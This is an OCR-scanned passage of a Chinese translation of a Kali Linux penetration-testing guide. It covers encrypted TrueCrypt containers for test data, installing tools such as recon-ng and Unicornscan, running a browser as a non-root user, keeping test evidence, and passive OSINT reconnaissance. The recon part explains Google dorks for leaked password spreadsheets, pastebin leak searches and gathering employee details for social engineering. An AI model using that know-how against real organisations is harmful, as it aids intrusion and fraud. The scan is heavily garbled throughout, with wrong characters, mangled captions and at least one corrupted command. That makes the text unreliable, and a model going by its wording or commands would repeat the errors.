3. 在 主 菜 单 中 ， 选 择 创建 卷 (Create Volume) 按钮 。 这 可 以 启动 TrueCrypt Volume 创 建 向 导 (TrueCrypt Volume 


Creation Wizard) ， 如 图 1.16 所 示 。 


* TrueCrypt Volume Creation Wizard 


TrueCrypt Volume Creation Wizard 


Creates a virtual encrypted disk within a file. Recommended for 
Inexperienced users. 


More information 


() Create a volume within a partition/drive 


Formats and encrypts a non-system partition, entire external or 
secondary drive, entire USB stick, etc. 


ENMUETCUEETTERNTTM 


图 1.16 TrueCrypt Volume €] 4 15] 3- 
4. 选 择 Create an encrypted file container 选 项 ， 然 后 点 击 下 一 步 (Next) 按钮 。 
5. 下 一 个 界面 会 提示 卷 类 型 (Volume Type) 选项 ， 然 后 选择 Standard TrueCrypt volume， 并 点 击 Next 按 钮 。 


6. 在 Volume Location 界 面 ， 选 择 9elect File。 你 需要 在 Specify a New TrueCrypt Volume 中 输入 名 称 (Name) ， 并 保 
人 存在 指定 的 文件 夹 中 ， 如 图 1.17 所 示 。 


Volume Location 


| Select File... | 


Never save history 


“ Specify a New TrueCrypt Volume i pt container), 


| etc. A 
Name: be, for 
= ‘Select File’ 
Save in folder: lgioot o | ee 
(+| Browse for other folders | NOT encrypt 
u 一 | ——————, Wk created 
| Cancel | | save | ng files (later 
ou are about 


- oc eate now. 


| Help | | < Prev | Next> | | Cancel | 


图 1.17 Specify a New TrueCrypt Volume 中 输入 名 称 


7. 选 择 一 个 文件 名 。 不 能 选择 与 测试 客户 相关 的 文件 名 ， 或 者 能 指明 敏感 资料 仓 企 于 目录 中 的 文件 名 。 用 数字 或 者 编码 来 表 
示 客 尸 ， 用 一 般 的 名 字 表 示 结 果 。 把 文件 保存 在 果 面 上 ， 然 后 点 击 Next 按 钮 。 


8. 图 1.18 提 供 了 加 密 选 项 (Encryption Options) 。 从 下 拉 菜 单 里 选择 加 密 算法 (Encryption Algorithm) 。 菜 单 包 合 了 几 


个 加 密 算法 ， 对 于 弟 规 目的 来 说 ，AES (默认 密 钥 长 度 为 256 位 ) 已 经 足够 了 。 你 也 会 选择 一 个 哈 希 算法 (Hash Algorithm) , 


默认 情况 下 ，RIPEMD-160 也 是 够 了 。 人 在 完成 选择 后 ， 操 击 下 一 步 (Next) 按钮 。 


TrueCrypt Volume Creation Wizard 


Encryption Options 
Encryption Algorith 


NN 


FIPS-approved cipher (Rijndael, published in 1998) that 
may be used by U.S. government departments and 
agencies to protect classified information up to the Top 
Secret level. 256-bit key. 128-bit block, 14 rounds 
(AES-256). Moda of operation is XTS. 


More information on AES 


rHash Algarithr 


RIPEMD-160 | + | Information on hash algorithms 


图 1.18 JZ eR 


9. 然 后 提示 你 选择 卷 容量 (Volume Size) 。 你 应 该 选择 一 个 最 小 的 ， 大 概 500MB， 但 是 ， 可 以 依照 测试 方法 进行 改变 ,之 
后 点 击 Next 按 钮 。 


10. 根 据 提供 的 强 密码 规则 来 选择 卷 口令 (Volume Password) 。 选 择 并 确认 密码 ， 然 后 点 击 Next 按 钮 ， 如 图 1.19 所 示 。 


TrueCrypt Volume Creation Wizard 


Volume Password 


password: | o 0 0 0 O 
Confirm password: | | 


[] Display password 


[] Use keyfiles | Keyfiles... 


It is very important that you choose a good password. You should 
avoid choosing one that contains only a single word that can be 
found in a dictionary (or a combination of 2, 3, or 4 such words). It 
should not contain any names or dates of birth. It should not be 
easy to guess. A good password is a random combination of upper 
and lower case letters, numbers, and special characters, such as @ 
^ —$* + etc. We recommend choosing a password consisting of 
more than 20 characters (the longer, the better). The maximum 
possible length is 64 characters. 


| Hep | | «Pre | 


图 1.19 ”设置 卷 口令 


| Cancel | 


11. 进 入 格式 选项 (Format Options) 界面 。 设 置 文件 系统 选项 (Filesystem Options) ， 从 下 拉 菜 单 中 选择 FAT， 之 后 后 
击 Next 按 钮 。 


12. 之 后 进入 卷 格式 化 (Volume Format) 界面 ， 为 加 密 的 文件 系统 创建 一 个 随机 密 钥 。 密 钥 是 根据 鼠标 移动 生成 的 ， 根 据 
提示 ， 在 一 个 窗口 上 移动 鼠标 一 段 时 间 ， 这 样 能 确保 加 密 密 钥 的 随机 性 (密码 长 度 ) 。 密 钥 生 成 之 后 ， 点 击 Format 创 建 
TrueCrypt. 


13. 最 后 ， 卷 创建 成 功 。 它 在 桌面 上 以 图 标的 形式 出 现 。 卷 是 被 加 密 的 ， 可 以 被 复制 到 一 个 外 部 存储 硬件 上 ， 或 者 移动 到 主 
机 系统 ， 在 这 些 过 程 中 ， 卷 仍 是 被 加 密 的 。 


要 使 用 加 密 的 乔 ， 必 须 先 在 TrueCrypt 主 菜单 中 选择 Slot 来 管理 加 密 的 文件 来 。 选 择 完 后 ， 用 Select File 按 钮 来 选择 加 密 文 
件 的 文件 名 。 在 这 个 例子 中 ， 我们 使 用 拧 面 上 预先 建 好 的 文件 pentest， 如 图 1.20 所 示 。 


* TrueCrypt 


- T - 


| Create Volume | 


Volume 


|/root/Desktop/pentest 


Never save history | Volume Tools... | | Select Device... | 


Mount Auto-Mount Devices | Dismount All | | Exit | 


图 1.20 TrueCtypt 加 密 卷 管理 


扎 击 Mount 按 钮 。 此 时 ， 界 面 会 提示 请 你 输入 密码 ， 如 图 1.21 所 示 。 


* Enter password for "/root/Desktop/pentest" 


O Cache passwords and keyfiles in memory Cancel 


D Display password 


[ ) Use keyfiles | Keyfiles... | | Options > | 


图 1.21 BA BAS 


PANE, TARE LA SSIot 1 的 详细 变化 ， 其 反映 出 加 密 文件 夹 的 属性 ， 果 面 上 出 现 一 个 叫 作 truerypt1 的 
新 图 标 ， 如 图 1.22 所 示 。 


* TrueCrypt 


Volumes Favorites 


| Slot Volume Size Mount Directory 
pentest Be 1 |/root/Desktop/pentest 499 MB |/media/truecrypti 
2 


truecrypt1 


E1.22 ”输入 正确 密码 后 的 界面 
如 果 你 双击 truecrypt1 图 标 ， 你 可 以 看 到 一 个 文件 浏览 器 (File Browser) 视图 。 


此 时 ， 它 充当 一 个 剃 规 的 目录 ， 你 可 以 用 该 文件 夹 存 储 所 有 与 测试 相关 的 信息 。 当 你 使 用 完 文件 夹 中 的 内 容 ， 希 望 确保 所 有 
数据 均 加 密 时 ， 在 主 菜单 上 选择 Dismount， 文 件 夹 恢复 到 加 密 状态 。 


1.5 第 三 万 应 用 程序 的 管理 


时 然 Kali 预 半 了 数 百 个 应 用 程序 ， 但 是 为 了 有 效 地 测试 特定 的 环境 (如 工业 系统 ) ， 你 仍 需要 安 和 妆 额 外 的 应 用 程序 ， 添 加 新 
的 估 痛 工具 ， 或 者 确保 已 经 安 疼 了 目 己 喜欢 的 工具 。Kali 可 以 很 容易 地 找到 、 安 装 和 管理 这 些 工具 。 


1.5.1 安装 第 三 方 应 用 程序 


安装 第 三 方 应 用 程序 的 有 很 多 种 方法 : 使 用 apt-get 命 令 、 访 问 GitHub 和 资源 库 、 直 接 安 妆 应 用 程序 。 


所 有 工具 都 可 以 从 Kali Linuxie apt-get (install) 命令 进行 安装。 安 委 (install) 命令 可 以 在 命令 行 中 的 一 
个 终端 窗口 中 执行 ， 或 者 用 尸 可 以 选择 一 个 图 形 化 的 软件 包 管理 工具 。 


推荐 的 第 三 方 应 用 程序 包括 : 


apt-file: 这 是 一 个 命令 行 工具 ， 用 来 搜索 APT 包 系统 。 该 命令 允许 你 列 出 没有 安 闭 或 获取 的 包 的 内 容 。 
'gnome-tweak-tool: 该 应 用 允许 用 户 更 改 主题 和 快速 配置 果 面 选项 。 

instanbul: 这 是 一 个 贤 面 屏幕 记录 器 ， 可 以 用 它 来 制作 一 部 关于 果 面 活动 的 电影 。 

‘openoffice: 这 是 一 个 开放 源码 的 办 公 和 套件 《帮助 文 档 ) 。 

‘scrub: 这 是 一 个 安全 删除 〈 反 取证 ) 工具， 安全 地 删除 数据 ， 使 用 各 种 窗 蓄 模式 ， 以 符合 严格 的 政府 标准 。 

‘shutter: 这 是 一 个 截图 工具 ， 捕 捉 蝎 面 的 图 像 、 打 开 的 窗口 ， 或 茶 个 选择 。 

‘team viewer: 文 持 远程 访问 和 远程 管理 。 它 还 允许 测试 人 员 在 目标 网 络 上 预先 配置 计算 机 ， 并 且 对 目标 网 络 进行 远程 测试 。 


‘terminator: 这 是 一 个 Linux 终 端 窗口 的 替换 ， 人 允许 横 同 滚动 一 没有 更 多 的 包装 文本 ! 


不 存在 于 Debian 库 且 使 用 apt-get installa pin LAapAeeKalif. (Fe, BPR FRR, Vl 
协调 ， 可 能 会 破坏 依赖 性 导致 应 用 程序 运行 失败 。 


一 些 工具 对 于 软件 开 妈 项 目 使 用 GitHub 的 在 线 资 源 库 。 由 于 修订 Git 系 统 的 灵活 性 以 及 社交 媒体 等 方面 的 原因 ， 许 多 开 友 人 
员 喜 欢 这 种 开放 的 资源 库 。 我 们 将 使 用 工具 recon-ng， 一 个 网 络 侦察 框 以 。 


从 GitHub 的 资源 库 克 隆 recon-ng 的 当前 版 本 ， 请 使 用 以 下 命令 行 : 


cd /opt; git clone 
https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git 
cd opt/recon-ng 


./recon-ng.py 


Bim, —ÉEÉMFBU EX. GI, SSH im shesUnicornscan, mJLA[sIsIKali, HEAK: 
.确保 依赖 关系 是 首先 存在 的 : apt-get install flex. 

:下载 Unicornscan 的 最 新 版 本 (下 载 网 址 : www.unicornscan.org， 当 前 版 本 是 unicornscan-0.4.7-2) 。 

以 一 个 新 的 目录 提取 文件 的 内 容 : tar jxf unicornscan-0.4.7-2.tar.bz2. 

:更 改 目录 为 Unicornscan: cd unicornscan-0.4.7/. 


编译 源 代码 : ./configure CFLAGS--D GNU SOURCE&&make&&make install. 


因为 每 个 应 用 程序 的 确切 依赖 天 系 和 安 妆 过 程 都 会 友 生 变化 ， 所 以 你 需要 参考 开 上 友 商 的 目 述 文件 (README) ， 以 确保 正 
确 安装 和 配置 这 些 应 用 程序 。 


1.5.2 ”作为 普通 用 户 运 行 第 三 方 应 用 程序 


Kali Linux 的 目的 是 为 了 又 持 渗透 测试 。 大 多 数 工具 需要 超级 访问 权限 ， 这 也 丈 是 访问 工具 集 和 数据 会 借助 密码 和 加 密 保护 
的 原因 。 


然而 , 一些 第 三 方 工具 是 注定 不 会 有 超级 运行 权限 的 。 例 如 ，Web 浏 览 器 可 能 会 被 攻破 ， 并 给 予 攻击 者 超级 访问 权限 ， 这 
对 安全 有 重要 的 影响 。 


如 果 超 级 访问 权限 不 是 必需 的 ， 工 具 应 遵循 最 小 特权 原则 ， 作 为 一 个 普通 用 户 运 行 。 


要 运行 应 用 程序 ， 并 且 作 为 普通 用 户 运 行 该 应 用 程序 ， 使 用 超级 账户 登录 到 Kali，Kali 应 配置 一 个 普通 账户 。 在 这 个 例子 
中 ， 我 们 将 预先 用 adduser 命 令 创建 名 为 noroot 的 账户 。 


执行 以 下 步骤 以 普通 用 户 身份 运行 浏览 器 Ilceweasel。 

1. 创 建 一 个 普通 用 户 账户 。 在 这 个 例子 中 ， 我 们 将 使 用 noroot。 

2. 我 们 将 使 用 sux， 这 是 从 一 个 特权 用 户 传递 一 个 包装 应 用 给 普通 用 户 的 凭据 。 使 用 apt-get install 命 令 下 载 并 安装 Sux。 
3. 局 动 Web 浏 览 器 ， 然 后 将 其 最 小 化 。 

4. 输 入 命令 行 : psaux|grep iceweasel。 正 如 你 所 看 到 的 ，lceweasel 正 在 以 超级 权限 运行 。 


5. 关 闭 lceweasel， 使 用 命令 sux-noroot iceweasel 重 新 启动 ， 如 图 1.23 所 示 。 


rootütest:-£ ps aux |grep iceweasel 

root 4604 5.1 17.8 585044 89084 ? SL 17:56 | 0:01 iceweasel 

root 468/ 0.0 0.1 7/68 860 pts/0 D+ li:5b 0:00 grep iceweasel 
root@test:~# sux - noroot iceweasel 


图 1.23 ”使 用 命令 sux-noroot iceweasel € & Iceweasel 


如 果 你 检查 Iceweasel 标 题 栏 ， 你 会 看 到 它 作为 noroot 用 户 调 用 ， 一 个 没有 管理 员 权限 的 账户 ， 如 图 1.24 所 示 。 


Kali Linux, an Offensive Security Project - Iceweasel (as noroot) NE | O x 
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v ¢ E Google 


fal Most Visitedv Offensive Security "& Kali Linux ‘Ñ Kali Docs 


al @ file:///usr/share/kali-defaults/web/ 


图 1.24 X zRnoroot/f] P 


你 也 可 以 通过 检查 开放 进程 来 确认 Iceweasel 是 以 noroot 账 户 下 运行 的 ， 如 图 1.25 所 示 。 


root@test:~# ps aux |grep iceweasel 


root 4729 0.0 6.3 56084 1692 pts/O S+ 17 :57 0:00 su - noroot -c 
eval $TERM; exec env  IERM2'xterm' DISPLAY=':0.0' “iceweasel": 

noroot 4750 0.8 19.0 592224 949/6 ? ssl 1/:5/ 0:02 iceweasel 

root 484/ 0.0 0.1 7/768 £860 pts/l s+ 18:02 0:00 grep iceweasel 


图 1.25 ”使 用 开放 进程 确认 Iceweasel 以 hotoot 用 户 运行 


1.6 “渗透 测试 的 有 效 管理 


渗透 测试 中 最 困难 的 万 面 之 一 ， 是 在 测试 完成 后 ， 记 住 测试 的 网 络 或 目标 系统 的 所 有 有 关 部 分 ， 或 试图 记 住 实际 上 测试 的 目 


标 。 


BT 5r3 强 调 Draedis 和 MagicTree 等 党 理工 具 的 使 用 。 这 些 工 具 为 测试 数据 提供 了 一 个 中 央 人 储 库 ， 方 便 数 据 测试 。 此 外 ， 


们 通 弟 会 提供 一 些 框 絮 ， 让 测试 人 员 允 道 他 们 使 用 的 测试 方法 ， 以 及 哪些 测试 工作 仍 有 街 完 成。 这 种 性 质 的 工具 在 漏洞 评估 或 


[z 
渗透 测试 中 具有 极 好 的 协调 性 。 
这 些 工具 仍 位 于 Applications|Kali Linux|Reporting Tools|Evidence Management 荣 单 中 。 


但 是 ， 对 于 复杂 的 渗透 测试 ， 其 中 涉及 的 方法 ， 可 能 是 因为 它 更 好 地 适应 了 目标 网 络 ? 


一 些 测试 人 员 使 用 键盘 记录 器 或 者 Wireshark， 记 录 测 试 过 程 中 产生 的 击 键 和 数据 包 流 量 。 这 些 数据 是 有 用 的 ， 如 果 在 测试 


中 导致 网 络 或 应 用 中 断 ， 重 放 和 分 析 友 送 数 据 包 ， 能 够 识别 是 哪些 工具 包 影 响 了 网 络 。 


Kali Linux 包 括 几 个 更 适合 做 快速 笔记 的 工具 ， 以 及 用 于 迅速 增加 部 切 和 粘贴 数据 的 资源 库 的 工具 ， 包 括 KeepNote 和 Zim 
desktop wiki, 


测试 人 员 不 仅 需 要 进行 测试 ， 并 收集 数据 ， 他 们 还 要 将 研究 结果 反馈 给 客 尸 。 这 是 非常 困难 的 ， 因 为 有 些 结果 很 短暂 ， 在 一 
个 时 间 点 上 有 一 个 测试 说明 文档 ， 但 是 ， 某 时 在 目标 系统 上 的 数据 会 改变 ， 未 来 的 测试 不 能 证 明 过 去 文档 摘 述 的 安全 漏洞 ， 即 使 
它 可 能 重新 出 现 。 


对 于 好 结果 的 另 一 个 挑战 是 ， 它 们 需要 形成 客户 可 理解 的 文档 。 
黄金 法 则 是 要 随时 抓 取 正 面 的 、 洪 在 的 结果 的 屏 替 截图 。 使 用 一 种 工具 (Shutter) iter CVE. 


在 默认 情况 下 ，Kali 配 置 了 一 个 跨 平台 的 命令 行 工具 一 -CutyCapt， 来 捕捉 网 页 并 创建 多 种 类 型 的 图 像 ， 包 括 PDF、PS、 
PNG、JPEG、TIFF、GIF 和 BMP。 


例如 ， 要 创建 谷歌 搜索 页 面 中 一 张 特定 大 小 的 图 像 ， 应 输入 如 下 命令 行 提示 符 : 
..Ccutycapt --url=http://www.google.com --out=google.png --min-width=300 
--min-heightheight=250. 

在 执行 时 ， 会 显示 在 前 面 的 命令 中 指定 过 大 小 的 图 像 ， 如 图 1.26 所 示 。 


root@kali2:~# cutycapt --url-http://www.google.com --out=google.png --min-width-360 --min-height-250 
rootükali2:-43 is " | 


goog nu ImageMagick: google.png 
roulf@Kaliz:-¥ display google.png 


Canada 


Google 


Google Search | rm Fesingtucby | 


Soogle.caoflered in Fraszais 


Goode Aboul Google oogle.com 


图 1.26 ”使 用 CutyCapt 抓 取 的 屏幕 截图 
当 演 示 基 于 Web 的 网 络 漏洞 时 ，CutyCapt 是 特别 有 用 的 ， 如 运行 跨 站 点 脚本 。 


静态 图 像 是 非 澡 有 用 的 ， 但 是 ， 一 个 攻击 视频 会 包括 如 何 破坏 目标 网 络 ， 以 及 攻击 者 获取 敏感 数据 的 行为 ， 所 以 视频 也 是 一 
个 非 钊 引信 注 目的 工具 。instanbul 屏 幕 录 像 机 创建 关于 正在 进行 的 漏洞 攻击 的 视频 ， 出 于 训练 目的 ， 人 允许 它 重复 播放 ， 或 者 向 
客户 证 明 漏 洞 仓 在 。 


17 Be 


/一 器 


本 草 讨 论 了 Kali， 这 个 工具 集合 ， 它 被 测试 人 员 广 泛 应 用 ， 通 过 渗透 来 评估 数据 系统 和 网 络 的 安全 性 。 我 们 强调 Kali 作 为 一 
个 虚拟 机 ， 同 时 人 允许 主机 操作 系统 和 虚拟 机 用 户 进行 测试 。 


Kali 是 一 个 工具 库 ， 在 使 用 它 的 过 程 中 ， 保 证 工具 的 实时 性 是 一 项 巨大 挑战 。 这 里 ， 我 们 回顾 了 Debian 包 管理 系统 以 及 如 


何 从 命令 行 和 GUI 应 用 程序 初始 化 更 新 。 更 重要 的 是 ， 学 习 了 如 何 定制 化 Kali 来 增强 工具 和 收集 的 数据 的 安全 性 。 我 们 致力 于 实 
现 利用 工具 来 广 持 过 程 的 目标 ， 而 不 是 过 程 文 持 工 具 。 


下 一 章 ， 我 们 将 学 习 如 何 有 效 利 用 开源 情报 (OSINT) 来 识别 目标 的 脆弱 性 攻击 表面 和 创建 特定 的 用 尸 密 码 表 ， 这 会 使 社 
会 工程 学 攻击 和 其 他 攻击 变 得 更 容易 。 


Boe ”确定 目标 一 一 自动 傣 察 


在 针对 网 络 或 目标 服务 器 进行 渗透 测试 或 攻击 时 ， 侦 察 是 杀 链 (kill chain) 的 第 一 步 。 在 进行 渗透 测试 时 ， 攻 击 者 通 单 会 


化 费 75% 的 时 间 来 进行 侦察 ， 在 侦察 阶段 ， 可 以 定义 攻击 目标 ,确定 攻击 目标 的 映射 天 系 ， 探 寻 其 安全 漏洞 ， 并 最 终 达 到 利用 目 
的 。 


侦察 可 以 分 为 两 种 类 型 : 被 动 侦 察 (passive reconnaissance) 和 主动 侦察 (active reconnaissance) 。 


馈 动 侦察 一 般 是 指 分 析 公 开 的 信息 ， 这 些 信息 包括 目标 本 身 的 信息 、 在 线 的 公共 资源 信息 。 在 获取 这 些 信息 时 ,测试 者 或 攻 
击 者 不 会 与 目标 交互 ， 他 们 的 请 求 和 活动 个 会 被 日 志 记 录 ， 也 无 法 直接 定位 测试 者 。 因 此 ， 在 被 动 侦察 中 要 尽 可 能 地 减少 与 目标 
的 交互 ， 与 目标 的 交互 可 能 会 确认 攻击 者 身份 。 


在 本 世 中 ， 你 将 学 习 被 动 侦察 的 原则 与 实例 ， 主 要 包括 如 下 内 容 : 
-侦察 的 基本 原则 。 


:开源 情报 (Open-source intelligence, OSINT) . 
DNS 侦察 与 路 由 映射 ， 包 括 IPv4 和 IPv6 两 个 主题 。 
获取 用 户 相 关 信 息 。 

分析 用 户 密 码 列表 。 


主动 侦察 则 与 目标 直接 交互 ， 主 要 在 第 3 章 中 介绍 。 


2.1 ”侦察 的 基本 原则 


在 进行 渗透 测试 或 攻击 数据 目标 时 ， 侦 察 是 杀 链 的 第 一 步 。 这 是 在 实际 测试 或 攻击 目标 网 络 之 前 进行 的 。 侦 察 的 结果 会 给 
需要 额外 侦察 的 万 同 或 者 指出 在 漏洞 利用 阶段 要 攻击 的 漏洞 。 


侦察 活动 是 与 目标 网 络 或 设备 交互 过 程 的 一 部 分 。 
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图 2.1 漏洞 利用 过 程 模型 简 图 


馈 动 侦察 并 不 与 目标 网 络 产 生 直 接 的 交互 。 攻 击 者 的 源 IP 地 址 和 活动 不 会 被 日 志 记 录 (例如 ， 一 个 对 目标 邮件 地 址 的 谷歌 搜 
R) 。 在 正常 的 商业 活动 中 想 要 区 分 出 哪些 活动 是 被 动 侦 察 是 困难 的 ,或 者 说 是 不 可 能 的 。 


馈 动 侦察 的 重点 一 般 是 商业 、 监 管 环境 、 公 司 、 员 工 。 这 一 类 的 信息 可 以 从 网 络 或 其 他 公共 资源 获取 ， 有 了 时， 可 以 参考 开源 
情报 ， 或 者 OSINT。 


- 当 攻 击 者 以 一 种 可 预期 的 方式 与 目标 交互 时 ， 被 动 侦察 可 以 看 作 是 与 目标 的 正常 交互 。 例 如 ， 攻 击 者 登录 公司 网 站 、 浏 览 不 同 的 网 页 、 下 载 
进一步 研究 的 文档 。 这 些 交 互 活动 属于 可 预期 的 用 户 活 动 ， 很 少 被 看 作 是 攻击 目标 的 前 答 。 


:主动 侦察 涉及 和 直接 但 询 或 其 他 交互 活动 〈 例 如， 目标 网 络 的 并 口 扫描 ，》。 这 些 活动 会 触发 系统 警报 ， 被 攻击 的 目标 也 能 获取 攻击 者 的 TP 地 址 
和 活动 信息 。 在 法 律 诉 讼 中 ， 这 些 信息 能 够 用 来 确认 攻击 者 的 映 份 ， 或 抓 捕 攻击 者 。 因 此 ， 测 试 者 在 主动 侦察 中 需要 额外 拉 术 手段 来 确保 不 被 
发 现 ， 第 3 章 将 详细 介绍 主动 侦察 与 漏洞 扫描 。 


渗透 测试 人 员 或 者 攻击 者 一 般 会 遵循 一 个 结构 化 的 信息 收集 过 程 一 一 从 广泛 的 信息 (商业 信息 、 监 管 环境 信息 ) 收集 ， 到 
特定 具体 的 信息 (用 尸 账户 数据 ) 收集 。 


为 了 提高 效率 ， 测 试 人 员 需 要 准确 地 知道 他 们 需要 找寻 的 信息 ， 以 及 在 开始 收集 信息 前 就 知道 这 些 数据 怎么 使 用 。 利 用 被 动 
侦察 和 限制 收集 数据 的 数量 ， 能 最 大 限度 地 降低 被 友 现 的 风险 。 


2.2 ”开源 情报 


一 般 来 说 ， 渗 透 测试 或 进行 攻击 的 第 一 步 是 开源 情报 收集 。 


OSINT 指 的 是 从 公共 的 资源 ， 特 别 是 互联 网 上 ， 进 行 信息 收集 。 可 用 的 信息 是 相当 多 的 
正 积极 地 在 OSINT 中 收集 目标 信息 ， 并 防止 目 身 数据 的 泄露 。 


大 多 数 的 情报 机 构 和 军事 组 织 


OSINT 收 集 过 程 和 分 析 过 程 是 非常 复杂 的 ， 这 部 分 内 容 可 以 独立 写成 一 本 书 ; 因此 ， 本 书 只 着 重 介 绍 需 要 的 知识 。 


局 可 在 线 获 取 美 国 军用 手册 ATP 2-22.9 (http://www. fas.org/irp/doddir/army/atp2-22-9.pdf) MINATO OSINTFAT — 
(http: //information-retrieval.info/docs/NATO-OSINT.html) ， 它 们 在 怎么 收集 和 访问 OSINT 方 面 提 供 了 极 好 的 技术 综述 。 


需要 收集 的 目标 信息 依赖 于 渗透 测试 的 切 始 目标 。 例 如 ， 如 果 测 试 人 员 要 访问 财务 数据 ， 那 么 他 们 需要 相关 人 员 (财务 总 
is. MRIKA., AWS, SE) 的 姓名 和 履历 信息 、 他 们 的 用 记名 和 密码 。 如 果 攻 击 路 线 包 括 社 区 工程 ， 他 们 可 能 会 将 这 个 信息 
补充 上 ， 以 提供 请 求 信息 的 真实 性 。 


OSINT 收 集 ， 通 党 从 对 目标 的 官方 视频 会 议 (网 站 、 博 客 、 社 人 交 媒体 网 页 ， 以 及 第 三 方 数据 存储 ， 如 公共 财政 记录 ) 存在 
的 一 个 论述 开始 。 主 要 信息 包含 : 


办公室 的 地 理 位 置 ， 尤 其 是 远程 或 者 卫星 办 公 室 ， 这 些 办 公 室 共有 至 企业 信息 ， 但 可 能 缺少 严格 的 安全 控制 。 
忌 公 司 和 所 有 分 公司 的 概述 ， 尤 其 是 那些 合并 或 收购 的 新 公司 (这 些 公 司 通常 不 会 像 忆 公司 那样 安全 ) 。 
公司 员工 名 字 和 联系 方式 的 信息 ， 尤 其 是 名 字 、 电 子 邮 件 地 址 和 手机 号 码 。 

公司 文化 和 语言 的 上 暗示， 这 个 可 能 导致 社交 工程 攻击 。 

可 能 连接 到 目标 网 络 的 商业 伙伴 或 者 供应 丙 。 


:正在 使 用 的 技术 。 例 如 ， 如 果 目 标 肥 布 了 一 篇 关于 采用 新 刹 件 或 者 软件 的 新 闻 稿 ， 攻 击 者 就 会 去 回顾 供应 商 网 站 的 故障 报告 ， 己 知 或 值得 怀 
疑 的 漏洞 ， 以 及 其 他 可 以 用 于 多 种 攻击 的 细 市 。 


攻击 者 可 能 利用 的 其 他 在 线 信息 源 如 下 : 


谷歌 和 必 应 这 些 搜索 引擎 。 从 历史 上 来 说 ， 这 些 搜索 都 依靠 手工 ， 攻 击 者 输入 指定 的 或 者 感 兴 趣 的 搜索 词 。 例 如 ， 搜 索 词 为 * 公 司 名 字 ?“+ 窗 
码 文件 类 型 。Exce1 电 子 表格 可 能 包含 雇员 密码 。 这 些 搜索 词 被 称 为 google dork (www.exploit-db.com/google-dork/) 。 大 多 数 搜索 


引擎 用 已 经 发 布 的 API 来 实行 自动 查找， 使 搜索 工具 更 加 高 效 ， 例 如 Maltego。 


yangex 是 最 有 效 来 的 搜索 引擎 之 一 (www. yandex.com) ， 这 是 俄 岁 斯 语 的 搜索 引擎， 是 世界 上 第 四 大 搜索 引擎 ， 它 允许 用 户 用 几 种 不 同 
的 语言 搜索 ， 包 插 英 语 。 它 也 支持 粒度 搜索 表达 式 ， 这 使 得 它 搜索 制定 信息 时 比 谷歌 更 有 效率 。 


应 该 被 搜索 的 其 他 在 线 资 源 包括 : 


政府 、 金 融 网 站 或 者 其 他 管理 网 站 ， 这 些 网 站 提供 企业 合并 及 并 购 ， 关 键 人 物 名 字 和 所 文 持 的 数据 等 信息 。 
新闻 组 ， 尤 其 是 来 目 目标 的 雇员 发 表 的 新 闻 称 ， 这 些 雇员 在 寻找 特定 技术 的 帮助 。 


:LinkedIn、Jigsaw 和 其 他 提供 雇员 信息 的 网 站 。 


求职 网 站 ， 尤 其 是 那些 提供 为 拉 术 职位 技术 和 服务 列表 网 站 ， 这 些 拷 术 和 服务 必须 由 成 功 的 申请 人 提供 。 
:历史 的 或 者 缓存 的 内 容 ， 由 搜索 引 敬 检索 (缓存 : 谷歌 


中 的 URI 或 者 位 于 www.archive.org 的 WayBcka Machine) 。 
特定 的 国家 和 语言 的 社交 和 商业 网 站 (参考 http://searchenginecolossus.com) 。 


累计 和 比较 来 自 不 同 搜索 网 站 结果 的 网 站 ， 例 如 Zuula (www.zuula.com) . 
公司 和 雇员 的 博客 ， 也 就 是 关键 雇员 的 个 人 博客 。 


社交 了 网络 (LinkedIn. Facebook. UA/&Twitter) 。 


浏览 DNS、 路 由 器 和 服务 器 信息 的 网 站 ， 特 别 是 DNSstuff (www.dnsstuff.com) ~ ServerSniff (www.serversniff.net) 、 
Netcraft (www.netcraft.com) 和 myIPneighbors .com。 


‘Shodan (www.shodanhg.com) ， 有 时 候 被 称 为 "黑客 的 谷歌 “”，Shodan 列 出 了 可 访问 互联 网 的 设备 且 人 允许 测试 者 搜索 已 知 漏洞 的 设备 。 
密码 垃圾 站 (pastebin， 用 site: pastebin.com 漏 润 “targetURL” 搜 索 ) 


管理 调查 结果 是 很 难 的 ， 然 而 ，Kali 有 KeepNote， 它 支持 快速 导入 和 不 同类 型 数据 的 管理 。 
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2.3 DNS3 侦 察 和 路 由 映射 


一 旦 测试 员 确 定 其 感 兴趣 的 目标 在 线 ， 下 一 步 就 是 识别 目标 的 IP 地 址 和 路 由 。 
DNS 侦 察 关心 的 是 : 识别 谁 拥 有 一 个 特定 域 或 一 系列 IP 地 址 (whois- 类 别 信息 ) ， 定 义 实际 域名 的 DNS 信 息 和 标识 目标 的 
IP 地 址 ， 以 及 在 渗透 测试 员 或 攻击 者 与 最 终 目标 之 间 的 路 由 。 


搜集 这 些 信息 是 半 主 动 的 ， 一 些 信息 是 免费 开源 的 ， 而 另 一 些 信息 来 目 第 三 方 实 体 ， 例 如 DNS 注册 机 构 。 昌 然 注册 机 构 可 
能 会 收集 IP 地 址 和 关于 攻击 者 的 请 求 的 数据 ， 但 很 少 提供 终端 目标 的 信息 。 可 以 由 目标 直接 检测 到 的 信息 是 从 不 用 来 评估 或 者 保 
留 的 ， 如 DNS 服 务 器 日 志 。 


因为 需要 的 信息 可 以 用 一 个 确定 的 系统 级 、 有 条 理 的 方法 查询 到 ， 所 以 也 可 以 上 自动 收集 信息 。 


pnws 信 息 可 能 包括 旧 的 或 者 不 正确 的 单元 。 为 了 最 小 化 错误 的 信息 ， 可 以 查询 不 同 源 服务 器 以 及 用 不 同 的 工具 来 交叉 验证 结 订 。 评 佑 结 
宋 ， 并 手动 识别 任何 可 疑 的 发 现 。 用 一 个 脚本 来 目 动 收 集 信息 。 脚 本 应 该 创建 一 个 渗透 测试 的 文件 来 ， 然 后 为 每 个 正在 运行 的 应 用 创建 一 系列 
文件 来 。 在 脚本 执行 完 每 个 命令 后 ， 直 接 把 结果 传送 给 指定 的 文件 夹 。 


2.3.1 WHOIS 


研究 |P 地 址 空间 的 第 一 步 是 识别 分 配给 目的 网 站 的 地 址 。 一 般 通过 使 用 whois 合 令 来 完成 ， 该 命令 允许 人 们 得 询 互 联网 资源 
中 的 相关 信息 数据 库 ， 数 据 库 包含 注册 用 户 的 域名 或 者 |P 地 址 。 


依赖 于 查询 的 数据 库 ， 对 whois 请 求 的 响应 ， 将 会 提供 名 字 、 物 理 地 址 、 电 话 号 码 和 电子 邮件 地 址 (在 社交 工程 攻击 中 是 有 
用 的 ) ， 也 包括 IP 地 址 和 DNS 服务 器 名 。 


攻击 者 用 whois 查 询 语句 可 以 得 到 |: 


